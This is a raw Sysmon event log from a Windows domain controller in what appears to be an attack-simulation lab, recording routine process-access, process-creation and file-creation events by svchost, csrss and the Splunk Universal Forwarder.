13:11:59.218{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003310Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:59.218{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-431F-6000-A400-000000009A01}4956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003309Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:59.218{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-431F-6000-A400-000000009A01}4956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003308Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:59.218{08A6967A-431F-6000-A400-000000009A01}4956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000003322Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:00.752{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\README.txt2021-01-14 13:12:00.752 11241100x80000000000000003321Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:00.752{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\LICENSE.txt2021-01-14 13:12:00.752 10341000x80000000000000003412Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4321-6000-AA00-000000009A01}5080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003411Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003410Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003409Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003408Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003407Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003406Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003405Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003404Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003403Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003402Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4321-6000-AA00-000000009A01}5080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003401Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.989{08A6967A-4321-6000-A600-000000009A01}4240748C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{08A6967A-4321-6000-AA00-000000009A01}5080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+14738|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003400Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.992{08A6967A-4321-6000-AA00-000000009A01}5080C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4321-6000-A600-000000009A01}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2316 10341000x80000000000000003399Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.942{08A6967A-4321-6000-A900-000000009A01}41964188C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003398Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.691{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4321-6000-A900-000000009A01}4196C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003397Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.691{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003396Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.691{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003395Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.691{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003394Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.691{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003393Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.691{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003392Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.691{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003391Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.691{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003390Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 